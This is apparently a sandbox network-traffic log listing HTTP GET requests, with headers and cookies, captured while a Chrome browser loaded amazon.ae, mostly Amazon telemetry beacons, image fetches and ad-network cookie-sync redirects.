Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:C37SFEY0GDXEZ5HDEVRN$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.294992.0%26id%3DC37SFEY0GDXEZ5HDEVRN%26ctb%3D1%26sc0%3Ddesktop-1-active%26cf0%3D41684%26pc0%3D41684%26ld0%3D41684%26t0%3D1723469044682%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DC37SFEY0GDXEZ5HDEVRN%26aftb%3D1%26lob%3D1:41683 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=262-5692979-3003613; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=261-1616972-1526733; session-token=u+Xu9IKk6z4bWSqe4Kvvln6p1zDqk1D7MnNB3tWScH7touYZc6sh6dHBcy2q2HhlEEXu80ZhJqEZM7k3rjxpO8gESSmSk1s6P1T+jKUCHdwhi4PKpFieH254fkL8Sx471FVO3uSkKyv0kMJuqkkEOmdxCmYS4Uu3M8HhXVFO8mGXjhRenzR1BGRPXv/dL6i02Av5x5UVUBkWBOjQsEM+LkEcipsOGdGjSyPfkOMzshISd9tYctqiC8wDGa2yLTvP1TSnUUd/BS2GJinV6ANw8B2KEiOU5rLMfVcFqNzDeQRe2A2vpRjUXoNG1EDbU2Uck7JLHPddRS6bAJSNyn0Zq9+V3fb/khVK
Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:C37SFEY0GDXEZ5HDEVRN$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.294992.0%26id%3DC37SFEY0GDXEZ5HDEVRN%26ctb%3D1%26sc0%3Ddesktop-7-active%26cf0%3D41685%26pc0%3D41685%26ld0%3D41685%26t0%3D1723469044683%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DC37SFEY0GDXEZ5HDEVRN%26aftb%3D1%26lob%3D1:41684 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=262-5692979-3003613; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=261-1616972-1526733; session-token=u+Xu9IKk6z4bWSqe4Kvvln6p1zDqk1D7MnNB3tWScH7touYZc6sh6dHBcy2q2HhlEEXu80ZhJqEZM7k3rjxpO8gESSmSk1s6P1T+jKUCHdwhi4PKpFieH254fkL8Sx471FVO3uSkKyv0kMJuqkkEOmdxCmYS4Uu3M8HhXVFO8mGXjhRenzR1BGRPXv/dL6i02Av5x5UVUBkWBOjQsEM+LkEcipsOGdGjSyPfkOMzshISd9tYctqiC8wDGa2yLTvP1TSnUUd/BS2GJinV6ANw8B2KEiOU5rLMfVcFqNzDeQRe2A2vpRjUXoNG1EDbU2Uck7JLHPddRS6bAJSNyn0Zq9+V3fb/khVK
Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:C37SFEY0GDXEZ5HDEVRN$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.294992.0%26id%3DC37SFEY0GDXEZ5HDEVRN%26ctb%3D1%26sc0%3DjQueryDomReady%26cf0%3D41684%26pc0%3D41684%26ld0%3D41684%26t0%3D1723469044682%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DC37SFEY0GDXEZ5HDEVRN%26aftb%3D1%26lob%3D1:41683 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=262-5692979-3003613; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=261-1616972-1526733; session-token=u+Xu9IKk6z4bWSqe4Kvvln6p1zDqk1D7MnNB3tWScH7touYZc6sh6dHBcy2q2HhlEEXu80ZhJqEZM7k3rjxpO8gESSmSk1s6P1T+jKUCHdwhi4PKpFieH254fkL8Sx471FVO3uSkKyv0kMJuqkkEOmdxCmYS4Uu3M8HhXVFO8mGXjhRenzR1BGRPXv/dL6i02Av5x5UVUBkWBOjQsEM+LkEcipsOGdGjSyPfkOMzshISd9tYctqiC8wDGa2yLTvP1TSnUUd/BS2GJinV6ANw8B2KEiOU5rLMfVcFqNzDeQRe2A2vpRjUXoNG1EDbU2Uck7JLHPddRS6bAJSNyn0Zq9+V3fb/khVK
Source: global trafficHTTP traffic detected: GET /redir/?partnerid=145&partneruserid=Ha_1cC9_SJCn5ipQf4mFVw&gdpr_consent= HTTP/1.1Host: rtb-csync.smartadserver.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bounce?%2Fsetuid%2Fa9%3Fentity%3D188%26code%3D1vbd3hfWRaKaFNeUMAIWwg%26redir%3Dhttps%253A%252F%252Faax-eu.amazon-adsystem.com%252Fs%252Fecm3%253Fex%253DxandrHMT%2526id%253D%2524UID%26gdpr_consent%3D HTTP/1.1Host: ib.adnxs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XANDR_PANID=ryG2H94f_9otSwXvPk-Wnq8vtiZ1u63ikOxGTw7BE5VJzFuyrPyM_9Yn5XSQ1JJUqnU03y5MLqf_j27xY5kswBp_Abtl5ITBLc7Z8c8uGlE.; receive-cookie-deprecation=1; uuid2=7851495324812903937
Source: global trafficHTTP traffic detected: GET /ul_cb/match?publisher_dsp_id=416&external_user_id=jvKAuWhPQAOXhozNWu4J2Q&r=https%3A%2F%2Faax-eu.amazon-adsystem.com%2Fs%2Fecm3%3Fex%3DimprovedigitalHMT%26id%3D%7BPUB_USER_ID%7D&gdpr_consent= HTTP/1.1Host: match.360yield.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: tuuid=471bc666-9183-441c-b075-b395526c6f74; tuuid_lu=1723469051
Source: global trafficHTTP traffic detected: GET /rd/uedata?rid=C37SFEY0GDXEZ5HDEVRN&sid=262-5692979-3003613&rx=9xw6nLWRqqXOVbh0OGx9Bg HTTP/1.1Host: www.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"device-memory: 8rtt: 250sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-viewport-width: 1280sec-ch-device-memory: 8viewport-width: 1280sec-ch-ua-platform-version: "10.0.0"dpr: 1downlink: 3.05sec-ch-dpr: 1ect: 4gsec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=262-5692979-3003613; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=261-1616972-1526733; session-token=u+Xu9IKk6z4bWSqe4Kvvln6p1zDqk1D7MnNB3tWScH7touYZc6sh6dHBcy2q2HhlEEXu80ZhJqEZM7k3rjxpO8gESSmSk1s6P1T+jKUCHdwhi4PKpFieH254fkL8Sx471FVO3uSkKyv0kMJuqkkEOmdxCmYS4Uu3M8HhXVFO8mGXjhRenzR1BGRPXv/dL6i02Av5x5UVUBkWBOjQsEM+LkEcipsOGdGjSyPfkOMzshISd9tYctqiC8wDGa2yLTvP1TSnUUd/BS2GJinV6ANw8B2KEiOU5rLMfVcFqNzDeQRe2A2vpRjUXoNG1EDbU2Uck7JLHPddRS6bAJSNyn0Zq9+V3fb/khVK; csm-hit=adb:adblk_no&t:1723469050516&tb:C37SFEY0GDXEZ5HDEVRN+s-C37SFEY0GDXEZ5HDEVRN|1723469050516
Source: global trafficHTTP traffic detected: GET /dspreply?dspId=1868&dspUserId=EgRZX5NfTZ-g23gofBqgwA&redir=https%3A%2F%2Faax-eu.amazon-adsystem.com%2Fs%2Fecm3%3Fex%3DdailymotionHMT2&id=&gdpr_consent= HTTP/1.1Host: public-prod-dspcookiematching.dmxleo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sync/init/amazon?redir=https%3A%2F%2Faax-eu.amazon-adsystem.com%2Fs%2Fecm3%3Fex%3Daudex.com%26id%3D%25s HTTP/1.1Host: audex.userreport.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /setuid?bidder=amazon&uid=DHDBStebRbqCXFPp5Hf3-Q&gdpr_consent= HTTP/1.1Host: pbs.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61xIrwwZU0L._SX1500_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/412CLCbp2pL._SR480,440_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/41Zp3xaXvPL._SR480,440_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/31ULjw05G7L.js?AUIClients/AmazonLightsaberPageAssets HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:C37SFEY0GDXEZ5HDEVRN$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3DC37SFEY0GDXEZ5HDEVRN%26m%3D1%26sc%3Dcsa%3Alcp%26lcp%3D17513%26pc%3D41698%26at%3D41698%26t%3D1723469044696%26csmtags%3Daui%3Asw%3Abrowser%3Aregister%3Asupported%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DC37SFEY0GDXEZ5HDEVRN%26aftb%3D1%26lob%3D1:41697 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=262-5692979-3003613; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=261-1616972-1526733; session-token=u+Xu9IKk6z4bWSqe4Kvvln6p1zDqk1D7MnNB3tWScH7touYZc6sh6dHBcy2q2HhlEEXu80ZhJqEZM7k3rjxpO8gESSmSk1s6P1T+jKUCHdwhi4PKpFieH254fkL8Sx471FVO3uSkKyv0kMJuqkkEOmdxCmYS4Uu3M8HhXVFO8mGXjhRenzR1BGRPXv/dL6i02Av5x5UVUBkWBOjQsEM+LkEcipsOGdGjSyPfkOMzshISd9tYctqiC8wDGa2yLTvP1TSnUUd/BS2GJinV6ANw8B2KEiOU5rLMfVcFqNzDeQRe2A2vpRjUXoNG1EDbU2Uck7JLHPddRS6bAJSNyn0Zq9+V3fb/khVK
Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:C37SFEY0GDXEZ5HDEVRN$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.294992.0%26id%3DC37SFEY0GDXEZ5HDEVRN%26ctb%3D1%26sc0%3DjQueryWindowLoad%26cf0%3D41685%26pc0%3D41685%26ld0%3D41685%26t0%3D1723469044683%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DC37SFEY0GDXEZ5HDEVRN%26aftb%3D1%26lob%3D1:41684 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=262-5692979-3003613; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=261-1616972-1526733; session-token=u+Xu9IKk6z4bWSqe4Kvvln6p1zDqk1D7MnNB3tWScH7touYZc6sh6dHBcy2q2HhlEEXu80ZhJqEZM7k3rjxpO8gESSmSk1s6P1T+jKUCHdwhi4PKpFieH254fkL8Sx471FVO3uSkKyv0kMJuqkkEOmdxCmYS4Uu3M8HhXVFO8mGXjhRenzR1BGRPXv/dL6i02Av5x5UVUBkWBOjQsEM+LkEcipsOGdGjSyPfkOMzshISd9tYctqiC8wDGa2yLTvP1TSnUUd/BS2GJinV6ANw8B2KEiOU5rLMfVcFqNzDeQRe2A2vpRjUXoNG1EDbU2Uck7JLHPddRS6bAJSNyn0Zq9+V3fb/khVK
Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:C37SFEY0GDXEZ5HDEVRN$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.294992.0%26id%3DC37SFEY0GDXEZ5HDEVRN%26ctb%3D1%26sc0%3DjQueryPageShow%26cf0%3D41686%26pc0%3D41686%26ld0%3D41686%26t0%3D1723469044684%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DC37SFEY0GDXEZ5HDEVRN%26aftb%3D1%26lob%3D1:41685 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=262-5692979-3003613; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=261-1616972-1526733; session-token=u+Xu9IKk6z4bWSqe4Kvvln6p1zDqk1D7MnNB3tWScH7touYZc6sh6dHBcy2q2HhlEEXu80ZhJqEZM7k3rjxpO8gESSmSk1s6P1T+jKUCHdwhi4PKpFieH254fkL8Sx471FVO3uSkKyv0kMJuqkkEOmdxCmYS4Uu3M8HhXVFO8mGXjhRenzR1BGRPXv/dL6i02Av5x5UVUBkWBOjQsEM+LkEcipsOGdGjSyPfkOMzshISd9tYctqiC8wDGa2yLTvP1TSnUUd/BS2GJinV6ANw8B2KEiOU5rLMfVcFqNzDeQRe2A2vpRjUXoNG1EDbU2Uck7JLHPddRS6bAJSNyn0Zq9+V3fb/khVK
Source: global trafficHTTP traffic detected: GET /rrum?cb=https%3A%2F%2Faax-eu.amazon-adsystem.com%2Fs%2Fecm3%3Fex%3DindexHMT%26id%3D&cm_dsp_id=198&external_user_id=Ug34bixMRdOJE2X5gE7KeQ&gdpr_consent=&C=1 HTTP/1.1Host: dsum-sec.casalemedia.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CMID=ZroM-Et3ueMAAE6RAZmgNgAA; CMPS=1295; CMPRO=1295
Source: global trafficHTTP traffic detected: GET /rd?url=https%3A%2F%2Faax-eu.amazon-adsystem.com%2Fs%2Fecm3%3Fex%3Dweborama%26id%3D%7BWEBO_ENC_CID%7D&bounce=1&random=1551935652 HTTP/1.1Host: rd.frontend.weborama.frConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AFFICHE_W=NiXGacQ4e0s294
Source: global trafficHTTP traffic detected: GET /test.png HTTP/1.1Host: a1d260d3e4810dfad67eec02571e86f4b.profile.akl50-c2.cloudfront.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /map?dsp_id=12&uid=pbdAiytLQL6pnGMSRhakrQ&gdpr_consent= HTTP/1.1Host: sync.rfp.fout.jpConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/41E6wo15qgL._SR480,440_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:C37SFEY0GDXEZ5HDEVRN$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.294992.0%26id%3DC37SFEY0GDXEZ5HDEVRN%26ctb%3D1%26sc0%3Daui%3Asw%3Actrl_changed%26bb0%3D1293%26pc0%3D42981%26ld0%3D42981%26t0%3D1723469045979%26csmtags%3Daui%3Asw%3Actrl_changed%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DC37SFEY0GDXEZ5HDEVRN%26aftb%3D1%26lob%3D1:42980 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=262-5692979-3003613; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=261-1616972-1526733; session-token=u+Xu9IKk6z4bWSqe4Kvvln6p1zDqk1D7MnNB3tWScH7touYZc6sh6dHBcy2q2HhlEEXu80ZhJqEZM7k3rjxpO8gESSmSk1s6P1T+jKUCHdwhi4PKpFieH254fkL8Sx471FVO3uSkKyv0kMJuqkkEOmdxCmYS4Uu3M8HhXVFO8mGXjhRenzR1BGRPXv/dL6i02Av5x5UVUBkWBOjQsEM+LkEcipsOGdGjSyPfkOMzshISd9tYctqiC8wDGa2yLTvP1TSnUUd/BS2GJinV6ANw8B2KEiOU5rLMfVcFqNzDeQRe2A2vpRjUXoNG1EDbU2Uck7JLHPddRS6bAJSNyn0Zq9+V3fb/khVK
Source: global trafficHTTP traffic detected: GET /ecm3?id=e62cb0294d38a92aebdbc5b49586e2&ex=freewheel.tv&gdpr=&gdpr_consent=&userId= HTTP/1.1Host: s.amazon-adsystem.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ad-id=A8HR2-Z3KU72iOU9MzYQW0U; ad-privacy=0
Source: global trafficHTTP traffic detected: GET /images/I/317I8lSNZAL._SR480,440_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /s/ecm3?ex=xandrHMT&id=1vbd3hfWRaKaFNeUMAIWwg HTTP/1.1Host: aax-eu.amazon-adsystem.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ad-id=A8HR2-Z3KU72iOU9MzYQW0U; ad-privacy=0
Source: global trafficHTTP traffic detected: GET /s/ecm3?ex=improvedigitalHMT&id=471bc666-9183-441c-b075-b395526c6f74&gdpr_consent= HTTP/1.1Host: aax-eu.amazon-adsystem.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ad-id=A8HR2-Z3KU72iOU9MzYQW0U; ad-privacy=0
